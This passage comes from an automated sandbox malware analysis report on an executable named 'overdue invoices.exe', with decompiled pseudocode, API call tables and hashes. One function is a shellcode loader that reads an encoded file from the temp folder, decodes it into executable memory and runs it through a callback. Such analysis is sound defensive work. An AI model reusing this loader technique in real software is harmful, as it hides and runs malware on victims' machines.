				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                  0x00402f06
                  0x00402f10
                  0x00402f12
                  0x00402f19
                  0x00402f1d
                  0x00402f28
                  0x00402f28
                  0x00402f30
                  0x00402f32
                  0x00402f39
                  0x00402f55
                  0x00402f59
                  0x00403022
                  0x00403022
                  0x00000000
                  0x00402f68
                  0x00402f6b
                  0x00402f71
                  0x00402f78
                  0x00402f7b
                  0x00402f84
                  0x00402ff1
                  0x00402ff7
                  0x00402ff9
                  0x00402ff9
                  0x0040300b
                  0x0040300f
                  0x00000000
                  0x00403011
                  0x00403011
                  0x00403014
                  0x0040301a
                  0x00000000
                  0x0040301a
                  0x00402f86
                  0x00402f89
                  0x0040301d
                  0x0040301d
                  0x00402f8f
                  0x00402f94
                  0x00402f94
                  0x00402f9c
                  0x00402f9e
                  0x00402f9e
                  0x00402faf
                  0x00402fb3
                  0x00000000
                  0x00000000
                  0x00402fc7
                  0x00402fcf
                  0x00402fed
                  0x00403024
                  0x00403024
                  0x00402fd6
                  0x00402fd6
                  0x00402fd9
                  0x00402fdc
                  0x00402fdf
                  0x00402fe9
                  0x00000000
                  0x00402feb
                  0x00000000
                  0x00402feb
                  0x00402fe9
                  0x00000000
                  0x00402fcf
                  0x00000000
                  0x00402f94
                  0x00402f89
                  0x00402f84
                  0x00402f7b
                  0x00402f59
                  0x00403025
                  0x00403029

                  APIs
                  • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                  • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                  • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FAF
                  • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$Read$PointerWrite
                  • String ID: 80A
                  • API String ID: 2113905535-195308239
                  • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                  • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 735E1000 Relevance: 10.6, APIs: 7, Instructions: 107memoryfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E735E1000(void* __edx) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				long _v24;
				short _v1064;
				short _t16;
				short _t17;
				short _t18;
				short _t19;
				short _t20;
				void* _t22;
				void* _t30;
				_Unknown_base(*)()* _t32;
				int _t35;
				long _t47;
				short _t48;
				void* _t51;
				_Unknown_base(*)()* _t57;
				long _t59;
				void* _t61;

				_t16 = 0x62;
				_t59 = 0x17d78400;
				_v20 = _t16;
				_t17 = 0x65;
				_v18 = _t17;
				_t18 = 0x75;
				_v16 = _t18;
				_t19 = 0x6b;
				_t48 = 0x79;
				_v14 = _t19;
				_t20 = 0x6c;
				_v10 = _t20;
				_v12 = _t48;
				_v8 = _t48;
				_v6 = 0;
				_t22 = VirtualAlloc(0, 0x17d78400, 0x3000, 4); // executed
				if(_t22 == 0) {
					return 0;
				} else {
					do {
						 *_t22 = 0;
						_t22 = _t22 + 1;
						_t59 = _t59 - 1;
					} while (_t59 != 0);
					GetTempPathW(0x103,  &_v1064);
					E735E4C80( &_v1064,  &_v20);
					_t30 = CreateFileW( &_v1064, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t61 = _t30;
					_t47 = GetFileSize(_t61, 0);
					_t32 = VirtualAlloc(0, _t47, 0x3000, 0x40); // executed
					_t57 = _t32;
					ReadFile(_t61, _t57, _t47,  &_v24, 0); // executed
					_t51 = 0;
					if(_t47 != 0) {
						do {
							 *((char*)(_t51 + _t57)) = ((( *((intOrPtr*)(_t51 + _t57)) - 0x00000063 ^ 0x0000000c) - 0x00000028 ^ 0x000000b4) + 0x00000075 ^ 0x000000c1) - 0x4c;
							_t51 = _t51 + 1;
						} while (_t51 < _t47);
					}
					_t35 = EnumResourceTypesA(0, _t57, 0); // executed
					return _t35;
				}
			}




























                  0x735e100e
                  0x735e1017
                  0x735e101c
                  0x735e1022
                  0x735e1025
                  0x735e1029
                  0x735e102c
                  0x735e1030
                  0x735e1033
                  0x735e1036
                  0x735e103a
                  0x735e1042
                  0x735e104a
                  0x735e104e
                  0x735e1052
                  0x735e1056
                  0x735e105a
                  0x735e4c7f
                  0x735e1060
                  0x735e1060
                  0x735e1060
                  0x735e1062
                  0x735e1063
                  0x735e1063
                  0x735e1074
                  0x735e1085
                  0x735e10a3
                  0x735e10a9
                  0x735e10ba
                  0x735e10bf
                  0x735e10c3
                  0x735e10cc
                  0x735e10d2
                  0x735e10d6
                  0x735e10d8
                  0x735e10e9
                  0x735e10ec
                  0x735e10ed
                  0x735e10d8
                  0x735e10f6
                  0x735e1102
                  0x735e1102

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 735E1056
                  • GetTempPathW.KERNEL32(00000103,?), ref: 735E1074
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 735E10A3
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 735E10AD
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 735E10BF
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 735E10CC
                  • EnumResourceTypesA.KERNEL32 ref: 735E10F6
                  Memory Dump Source
                  • Source File: 00000000.00000002.361614459.00000000735E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 735E0000, based on PE: true
                  • Associated: 00000000.00000002.361594899.00000000735E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000000.00000002.361647091.00000000735E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_735e0000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$AllocVirtual$CreateEnumPathReadResourceSizeTempTypes
                  • String ID:
                  • API String ID: 2006121276-0
                  • Opcode ID: 4079c7734f64eb39c8891ee29398488f6aa5d34440fa9fbd04813c920484cee9
                  • Instruction ID: 7a0f595eed0b464cf60bb5ce68c5743f2242d42f0241546deac22e3b3c92387d
                  • Opcode Fuzzy Hash: 4079c7734f64eb39c8891ee29398488f6aa5d34440fa9fbd04813c920484cee9
                  • Instruction Fuzzy Hash: 7331F4A26843587EFB109AB19C56FAF777CDF44B15F1004A6F704EF1C0D6B19A4683A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 423 40302c-403055 GetTickCount 424 403196-40319e call 402bc5 423->424 425 40305b-403086 call 4031da SetFilePointer 423->425 430 4031a0-4031a5 424->430 431 40308b-40309d 425->431 432 4030a1-4030af call 4031a8 431->432 433 40309f 431->433 436 4030b5-4030c1 432->436 437 403188-40318b 432->437 433->432 438 4030c7-4030cd 436->438 437->430 439 4030f8-403114 call 405e9d 438->439 440 4030cf-4030d5 438->440 446 403191 439->446 447 403116-40311e 439->447 440->439 441 4030d7-4030f7 call 402bc5 440->441 441->439 448 403193-403194 446->448 449 403120-403136 WriteFile 447->449 450 403152-403158 447->450 448->430 452 403138-40313c 449->452 453 40318d-40318f 449->453 450->446 451 40315a-40315c 450->451 451->446 454 40315e-403171 451->454 452->453 455 40313e-40314a 452->455 453->448 454->431 457 403177-403186 SetFilePointer 454->457 455->438 456 403150 455->456 456->454 457->424
                  C-Code - Quality: 94%
                  			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x41c20
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x3e99b
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x55dba8
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x2f9
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x410535
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x41c20
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}





















                  0x00403030
                  0x0040303d
                  0x00403050
                  0x00403055
                  0x00403196
                  0x00403198
                  0x00000000
                  0x0040319e
                  0x00403061
                  0x00403074
                  0x0040307a
                  0x00403080
                  0x0040308b
                  0x0040308b
                  0x0040308b
                  0x00403090
                  0x00403095
                  0x0040309d
                  0x0040309f
                  0x0040309f
                  0x004030a8
                  0x004030af
                  0x00000000
                  0x00000000
                  0x004030b5
                  0x004030bb
                  0x004030c1
                  0x004030c7
                  0x004030c7
                  0x004030cd
                  0x004030cf
                  0x004030d5
                  0x004030d7
                  0x004030ed
                  0x004030f2
                  0x004030f7
                  0x004030d5
                  0x004030fd
                  0x00403103
                  0x0040310d
                  0x00403114
                  0x00000000
                  0x00000000
                  0x00403116
                  0x0040311c
                  0x0040311e
                  0x00403152
                  0x00403158
                  0x00000000
                  0x00000000
                  0x0040315a
                  0x0040315c
                  0x00000000
                  0x00000000
                  0x0040315e
                  0x0040315e
                  0x00403171
                  0x00000000
                  0x00000000
                  0x00403180
                  0x00000000
                  0x00403180
                  0x0040312e
                  0x00403136
                  0x0040318d
                  0x00403193
                  0x00403193
                  0x00000000
                  0x0040313e
                  0x0040313e
                  0x00403144
                  0x0040314a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403150
                  0x00403136
                  0x00403191
                  0x00000000
                  0x00403191
                  0x00000000

                  APIs
                  • GetTickCount.KERNEL32 ref: 00403041
                    • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                  • WriteFile.KERNELBASE(0040B038,00410535,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                  • SetFilePointer.KERNELBASE(00041C20,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$Pointer$CountTickWrite
                  • String ID: 80A
                  • API String ID: 2146148272-195308239
                  • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                  • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 458 401f51-401f5d 459 401f63-401f79 call 4029e8 * 2 458->459 460 40200b-40200d 458->460 470 401f88-401f96 LoadLibraryExA 459->470 471 401f7b-401f86 GetModuleHandleA 459->471 462 402156-40215b call 401423 460->462 467 40287d-40288c 462->467 473 401f98-401fa6 GetProcAddress 470->473 474 402004-402006 470->474 471->470 471->473 475 401fe5-401fea call 404e23 473->475 476 401fa8-401fae 473->476 474->462 480 401fef-401ff2 475->480 478 401fb0-401fbc call 401423 476->478 479 401fc7-401fde call 735e1000 476->479 478->480 486 401fbe-401fc5 478->486 482 401fe0-401fe3 479->482 480->467 483 401ff8-401fff FreeLibrary 480->483 482->480 483->467 486->480
                  C-Code - Quality: 57%
                  			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                  0x00401f51
                  0x00401f51
                  0x00401f56
                  0x00401f5d
                  0x0040200b
                  0x00402156
                  0x00402156
                  0x0040287d
                  0x00402880
                  0x0040288c
                  0x0040288c
                  0x00401f6c
                  0x00401f76
                  0x00401f79
                  0x00401f88
                  0x00401f8c
                  0x00401f92
                  0x00401f96
                  0x00402004
                  0x00000000
                  0x00402004
                  0x00401f98
                  0x00401fa2
                  0x00401fa6
                  0x00401fea
                  0x00401fa8
                  0x00401fab
                  0x00401fae
                  0x00401fde
                  0x00401fb0
                  0x00401fb3
                  0x00401fbc
                  0x00401fbe
                  0x00401fbe
                  0x00401fbc
                  0x00401fae
                  0x00401ff2
                  0x00401ff9
                  0x00401ff9
                  0x00000000
                  0x00401ff2
                  0x00401f7c
                  0x00401f82
                  0x00401f86
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                  • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                  • String ID: ?B
                  • API String ID: 2987980305-117478770
                  • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                  • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 488 4015b3-4015c6 call 4029e8 call 40560c 493 4015c8-4015e3 call 4055a3 CreateDirectoryA 488->493 494 40160a-40160d 488->494 503 401600-401608 493->503 504 4015e5-4015f0 GetLastError 493->504 495 40162d-40215b call 401423 494->495 496 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 494->496 509 40287d-40288c 495->509 496->509 503->493 503->494 507 4015f2-4015fb GetFileAttributesA 504->507 508 4015fd 504->508 507->503 507->508 508->503
                  C-Code - Quality: 85%
                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                  0x004015b3
                  0x004015ba
                  0x004015bd
                  0x004015c2
                  0x004015c6
                  0x004015c8
                  0x004015d0
                  0x004015d6
                  0x004015d8
                  0x004015db
                  0x004015e3
                  0x004015f0
                  0x004015fd
                  0x004015fd
                  0x004015f2
                  0x004015f3
                  0x004015fb
                  0x00000000
                  0x00000000
                  0x004015fb
                  0x004015f0
                  0x00401600
                  0x00401603
                  0x00401605
                  0x00401606
                  0x004015c8
                  0x0040160d
                  0x0040162d
                  0x00402156
                  0x0040160f
                  0x00401611
                  0x0040161c
                  0x00401622
                  0x00401622
                  0x00402880
                  0x0040288c

                  APIs
                    • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 0040561A
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 3751793516-1104044542
                  • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                  • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 513 40578b-405795 514 405796-4057c0 GetTickCount GetTempFileNameA 513->514 515 4057c2-4057c4 514->515 516 4057cf-4057d1 514->516 515->514 518 4057c6 515->518 517 4057c9-4057cc 516->517 518->517
                  C-Code - Quality: 100%
                  			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                  0x0040578f
                  0x00405795
                  0x00405796
                  0x00405796
                  0x00405797
                  0x0040579e
                  0x004057a8
                  0x004057b5
                  0x004057b8
                  0x004057c0
                  0x00000000
                  0x00000000
                  0x004057c4
                  0x00000000
                  0x00000000
                  0x004057c6
                  0x00000000
                  0x004057c6
                  0x00000000

                  APIs
                  • GetTickCount.KERNEL32 ref: 0040579E
                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                  Strings
                  Memory Dump Source
